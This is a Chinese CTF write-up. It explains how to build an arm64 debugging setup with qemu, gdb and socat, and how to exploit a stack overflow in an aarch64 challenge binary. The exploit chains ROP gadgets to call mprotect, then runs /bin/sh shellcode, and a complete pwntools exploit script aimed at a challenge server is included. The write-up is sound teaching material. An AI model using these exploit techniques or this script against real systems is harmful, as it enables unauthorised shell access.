arm64 调试环境搭建及 ROP 实战
前言
比赛的一个 arm 64
位的 pwn
题,通过这个题实践了 arm 64
下的 rop
以及调试环境搭建的方式。
题目文件
https://gitee.com/hac425/blog_data/tree/master/arm64
程序分析
首先看看程序开的保护措施,架构信息
hac425@ubuntu:~/workplace$ checksec pwn
[*] '/home/hac425/workplace/pwn'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
程序是 aarch64
的 , 开启了nx
, 没有开 pie
说明程序的基地址不变。而且没有栈保护。
放到 ida
里面分析, 通过在 start
函数里面查看可以很快定位到 main
函数的位置
__int64 sub_400818()
{
sub_400760();
write(1LL, "Name:", 5LL);
read(0LL, &unk_411068, 0x200LL); // 往 bss 上读入 0x200 字节
sub_4007F0();
return 0LL;
}
main
函数的逻辑比较简单,首先读入 0x200
字节到 bss
段中的一个缓冲区, 然后调用另一个函数,这个函数里面就是简单的栈溢出。
__int64 sub_4007F0()
{
__int64 v1; // 数据大小为 8 字节
return read(0LL, &v1, 512LL); // 往 v1 处读入了 0x200 字节的数据
}
函数往一个 int64
类型的变量里面读入了 0x200
字节的数据, 栈溢出。
程序开启了 nx
, 说明我们需要通过 rop
的技术来 getshell
.
首先看看程序内还有没有可以利用的东西, 可以发现程序中还有 mprotect
。
我们可以使用 mprotect
来让一块内存变得可执行。 而且程序的开头我们可以往 bss
段写 0x200
字节的数据。
所以思路就有了:
- 利用程序开始往
bss
段写数据的机会,在bss
段写入shellcode
- 通过栈溢出和
rop
调用mprotect
让shellcode
所在内存区域变成rwx
- 最后调到
shellcode
执行
调试环境搭建
开始一直纠结在环境不知道怎么搭建,后来发现可以直接使用 apt
安装 arm
的动态库,然后用 qemu
运行即可。
sudo apt-get install -y gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn
-g 1234: 表示 qemu 会在 1234 起一个 gdbserver 等待 gdb 客户端连接后才能继续执行
-L /usr/aarch64-linux-gnu: 指定动态库路径
貌似 apt
还支持许多其他架构的动态库的安装, 以后出现其他架构的题也不慌了 _.
下面在使用 socat
搭建这个题, 方便输入一些 不可见的字符。
socat tcp-l:10002,fork exec:"qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn",reuseaddr
命令作用为 监听在 10002
端口, 每有一个连接过来,就执行
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn
此时我们可以把调试器 attach
上去调试目标程序。
可以在脚本中,当连接服务器后,暂停执行,等待调试器 attach
。
p = remote("127.0.0.1", 10002)
pause() # 等待调试 attach ,并让目标程序继续执行
简单了解 arm64
首先是寄存器的变化。
arm64
有32
个64bit
长度的通用寄存器x0
~x30
以及sp
,可以只使用其中的32bit
即w0
~w30
(类似于x64
中可以使用$rax
也可以使用其中的4
字节$eax
)。arm32
只有16
个32bit
的通用寄存器r0
~r12
,lr
,pc
,sp
.
函数调用的变化
arm64
前面 8 个参数 都是通过寄存器来传递x0
~x7
arm32
前面4
个参数通过寄存器来传递r0
~r3
,其他通过栈传递。
然后一些 rop
会用到的指令介绍
ret 跳转到 x30 寄存器,一般在函数的末尾会恢复函数的返回地址到 x30 寄存器
ldp x19, x20, [sp, #0x10] 从 sp+0x10 的位置读 0x10 字节,按顺序放入 x19, x20 寄存器
ldp x29, x30, [sp], #0x40 从 sp 的位置读 0x10 字节,按顺序放入 x29, x30 寄存器,然后 sp += 0x40
MOV X1, X0 寄存器X0的值传给X1
blr x3 跳转到由Xm目标寄存器指定的地址处,同时将下一条指令存放到X30寄存器中
定位偏移
对于栈溢出,我们需要定位到我们的输入数据的那一部分可以控制程序的 pc
寄存器。这一步可以使用 pwntools
自带的 cyclic
和 cyclic_find
的功能来查找偏移,这种方式非常的方便。
通过分析程序,我们知道程序会往 8
字节大小的空间内(int64
) 读入 0x200
字节,所以使用 cyclic
生成一下然后发送给程序。
写个poc
, 调试一下
from pwn import *
from time import sleep
p = remote("127.0.0.1", 10002)
pause()
p.recvuntil("Name:")
p.send("sssss")
sleep(0.5)
payload = cyclic(0x200)
p.sendline(payload)
p.interactive()
当连接到 socat
监听的端口后,脚本会暂停,这时使用 gdb
连接上去就可以调试了。
然后让程序继续运行,同时让脚本也继续运行。会触发崩溃
可以看到 pc
寄存器的值被修改为 0x6161617461616173
,同时栈上也都是 cyclic
生成的数据。
取 pc
的低四个字节(cyclic_find 最多支持 4 字节数据查找偏移)给 cyclic_find
来定位偏移。
In [23]: cyclic_find(0x61616173)
Out[23]: 72
所以 第 72
个字节后面就是返回地址的值了。
而且发现此时栈顶的数据刚好是返回地址都后面那一部分, 这个信息对于我们布置 rop
链也是一个有用的信息。
ROP
gadget 搜集
定位到 pc
的偏移后,下一步就是设置 rop
链了。
首先用 ROPgadget
查找程序中可用的 gadget
$ ROPgadget --binary pwn > pwn.txt
然后根据我们的目的和拥有的条件,去找需要的 gadget
.
回顾下我们的目标: 执行 mprotect
, 然后执行 shellcode
可以去看看 mprotect
的调用位置。
程序中已经有一个完整的调用, 而且地址范围也是恰好包含了我们 shellcode
的位置(0x411068
).所以只需要改第三个参数的值为标识可执行的即可。
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define PROT_EXEC 0x4 /* Page can be executed. */
#define PROT_NONE 0x0 /* Page can not be accessed. */
通过前面的了解我们知道 arm64
的 第三个参数放在 x2
寄存器里面,所以我现在就是要去找可以修改 x2
或者 W2
的 gadget
.
通过在 gadget
里面搜索 ,发现了两个可以结合使用的 gadget
0x4008AC : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ; mov w0, w24 ; add x19, x19, #1 ; blr x3
0x4008CC : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
第一个
gadget
使用x22
,x23
,x24
寄存器的值设置了x2
,x1
,w0
的值 , 这正好设置了函数调用的三个参数。然后会跳转到x3
. 而x3
是从x21 + x19<<3
处取出来的。第二个
gadget
则从 栈上取出数据设置了x19
~0x24
和x29,x30
然后ret
. 栈上的数据使我们控制的哇!
结合使用这两个 gadget
我们可以设置需要调用的函数的 3
个参数值, 那么我们就可以调用 mprotect
了。
布置 rop 链
下面分析 rop
链的构造
payload = cyclic(72)
payload += p64(0x4008CC) # pc, gadget 1
payload += p64(0x0) # x29
payload += p64(0x4008AC) # x30, ret address ----> gadget 2
payload += p64(0x0) # x19
payload += p64(0x0) # x20
payload += p64(0x0411068) # x21---> input
payload += p64(0x7) # x22---> mprotect , rwx
payload += p64(0x1000) # x23---> mprotect , size
payload += p64(0x411000) # x24---> mprotect , address
payload += p64(0x0411068 + 0x10)
payload += p64(0x0411068 + 0x10) # ret to shellcode
payload += cyclic(0x100)
首先使用 0x4008CC
处的 gadget
设置寄存器的值, 执行完后各个寄存器的值为
x30 = 0x4008AC --> 即第二段 gadget 的地址, ret指令时会 跳转过去,执行第二段 gadget
x21 = 0x0411068 --> 程序开头让我们输入的name存放的位置, 用于第二段 gadget 设置 x3
x19 = 0
x22 = 7 mprotect 的第3个参数, 表示 rwx
x23 = 0x1000 mprotect 的第2个参数
x24 = 0x411068 mprotect 的第1个参数
此时栈的布局为
p64(0x0411068 + 0x10)
p64(0x0411068 + 0x10) # ret to shellcode
cyclic(0x100)
然后执行第二段 gadget(0x4008AC)
首先
ldr x3, [x21, x19, lsl #3]
我们在第一段 gadget
时设置了 x21
为 name
的地址, x19
为 0
。 所以 x3
为 name
开始的 8
个字节。
然后设置 x0
~x2
的值。最后会 跳转到 x3
处。 此时参数已经设置好,我们在 发送 name
时把 开头 8 字节 设置为 调用 mprotect
的地址,就可以调用 mprotect
把 bss
段设置为 可执行了。
p.recvuntil("Name:")
payload = p64(0x4007E0) # 调用 mprotect
payload += p64(0)
payload += shellcode # shellcode
p.send(payload)
调用 mprotect
我这里选择了 0x4007E0
, 因为这里执行完后就会 从栈上取地址返回, 我们可以再次控制 pc
.text:00000000004007E8 LDP X29, X30, [SP+var_s0],#0x10
.text:00000000004007EC RET
执行到 04007E8
时的 栈
p64(0x0411068 + 0x10)
p64(0x0411068 + 0x10) # ret to shellcode
cyclic(0x100)
跳转到 shellcode
然后就会跳转到 0x0411068 + 0x10
也就是我们 shellcode
的位置。
执行shellcode
poc
from pwn import *
from time import sleep
elf = ELF("./pwn")
context.binary = elf
context.log_level = "debug"
shellcode = asm(shellcraft.aarch64.sh())
p = remote("106.75.126.171", 33865)
# p = remote("127.0.0.1", 10002)
# pause()
p.recvuntil("Name:")
payload = p64(0x4007E0)
payload += p64(0)
payload += shellcode
p.send(payload)
payload = cyclic(72)
payload += p64(0x4008CC) # pc, gadget 1
payload += p64(0x0) # x29
payload += p64(0x4008AC) # x30, ret address ----> gadget 2
payload += p64(0x0) # x19
payload += p64(0x0) # x20
payload += p64(0x0411068) # x21---> input
payload += p64(0x7) # x22---> mprotect , rwx
payload += p64(0x1000) # x23---> mprotect , size
payload += p64(0x411000) # x24---> mprotect , address
payload += p64(0x0411068 + 0x10)
payload += p64(0x0411068 + 0x10) # ret to shellcode
payload += cyclic(0x100)
sleep(0.5)
p.sendline(payload)
p.interactive()
最后发现这两段 gadget
位于 程序初始化函数的那一部分, 应该可以作为通用 gadget
.
总结
通过 搭建 arm64
程序调试环境,也明白其他架构调试环境搭建的方式
apt 安装相应的动态库,然后使用 qemu 执行, 使用 socat 起服务,方便调试
参考
https://peterpan980927.cn/2018/01/27/ARM64%E6%B1%87%E7%BC%96/
http://people.seas.harvard.edu/~apw/sreplay/src/linux/mmap.c
arm64 调试环境搭建及 ROP 实战的更多相关文章
- Windows下Lua+Redis 断点调试环境搭建==Linux下类似
Lua+Redis 断点调试环境搭建 windows环境,使用Redis,写lua脚本头疼的问题之一不能对脚本断点调试,google加上自己的摸索,终于搞定. 1.下载ZeroBraneStudio, ...
- Solr4.8.0源码分析(4)之Eclipse Solr调试环境搭建
Solr4.8.0源码分析(4)之Eclipse Solr调试环境搭建 由于公司里的Solr调试都是用远程jpda进行的,但是家里只有一台电脑所以不能jpda进行调试,这是因为jpda的端口冲突.所以 ...
- Windebug双机调试环境搭建
Windebug双机调试环境搭建 开始进行内核编程/驱动编程的调试工作是非常烦人的,由于程序运行与内核层不受操作系统的管控,所以容易引起主机蓝屏和崩溃是常有的事.这也就使得内核程序的调试成了一大 ...
- 《天书夜读:从汇编语言到windows内核编程》四 windows内核调试环境搭建
1) 基础篇是讲理论的,先跳过去,看不到代码运行的效果要去记代码是一个痛苦的事情.这里先跳入探索篇.其实今天的确也很痛苦,这作者对驱动开发的编译与调试环境介绍得太模糊了,我是各种尝试,对这个环境的搭建 ...
- HI3518E平台ISP调试环境搭建
海思的SDK提供了ISP调试的相关工具,降低了IPC的ISP调试的难度.初次搭建ISP调试环境,记录一下. SDK版本:Hi3518_MPP_V1.0.A.0 硬件平台:HI3518E_OV9732 ...
- 一步一步 Pwn RouterOS之调试环境搭建&&漏洞分析&&poc
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文分析 Vault 7 中泄露的 RouterOs 漏洞.漏洞影 ...
- eos源码分析和应用(一)调试环境搭建
转载自 http://www.limerence2017.com/2018/09/02/eos1/#more eos基于区块链技术实现的开源引擎,开发人员可以基于该引擎开发DAPP(分布式应用).下面 ...
- Vue源码学习(一):调试环境搭建
最近开始学习Vue源码,第一步就是要把调试环境搭好,这个过程遇到小坑着实费了点功夫,在这里记下来 一.调试环境搭建过程 1.安装node.js,具体不展开 2.下载vue项目源码,git或svn等均可 ...
- PhpStorm Xdebug远程调试环境搭建原理分析及问题排查
2017年05月26日 经验心得 目录 一. 环境介绍 二. 远程环境配置 2.2 Xdebug安装 2.3 配置 三. 本地phpstorm配置 3.1 下载远程代码 3.2 添加php解释器 ...
随机推荐
- opencv实现正交匹配追踪算法OMP
//dic: 字典矩阵: //signal :待重构信号(一次只能重构一个信号,即一个向量) //min_residual: 最小残差 //sparsity:稀疏度 //coe:重构系数 //atom ...
- Scala之隐式转换implicit详解
假设我们有一个表示文本的行数的类LineNumber: class LineNumber ( val num : Int ) 我们可以用这个类来表示一本书中每一页的行数: val lineNumOfP ...
- Java reflect 反射学习笔记
1. class 类的使用 万事万物皆对象 (基本数据类型, 静态成员不是面向对象), 所以我们创建的每一个类都是对象, 即类本身是java.lang.Class类的实例对象, 但是这些对象不需要 n ...
- manjaro 添加当前用户到kvm
原贴 https://askubuntu.com/questions/1050621/kvm-is-required-to-run-this-avd Check the ownership of /d ...
- Spring AOP介绍及源码分析
转自:http://www.uml.org.cn/j2ee/201301102.asp 软件开发经历了从汇编语言到高级语言和从过程化编程到面向对象编程:前者是为了提高开发效率,而后者则使用了归纳法,把 ...
- docker-compose部署elk+apm
1.安装docker 参考我的另外的一篇博客:https://www.cnblogs.com/cuishuai/p/9485939.html 2.安装docker-compose # yum -y i ...
- git第五节--git branch--分支管理
@git branch :查看当前仓库所有分支,及当前所处的分支 @git branch XXX:创建分支XXX @git checkout XXX:切换到分支XXX下 @git checkout - ...
- 第3章:Hadoop分布式文件系统(1)
当数据量增大到超出了单个物理计算机存储容量时,有必要把它分开存储在多个不同的计算机中.那些管理存储在多个网络互连的计算机中的文件系统被称为"分布式文件系统".由于这些计算机是基于网 ...
- Python数据分析之pandas入门
一.pandas库简介 pandas是一个专门用于数据分析的开源Python库,目前很多使用Python分析数据的专业人员都将pandas作为基础工具来使用.pandas是以Numpy作为基础来设计开 ...
- 设计模式之工厂方法(FactoryMethod)模式
在五大设计原则的基础上经过GOF(四人组)的总结,得出了23种经典设计模式,其中分为三大类:创建型(5种).结构型(7种).行为型(11种).今天对创建型中的工厂方法(FactoryMethod)模式 ...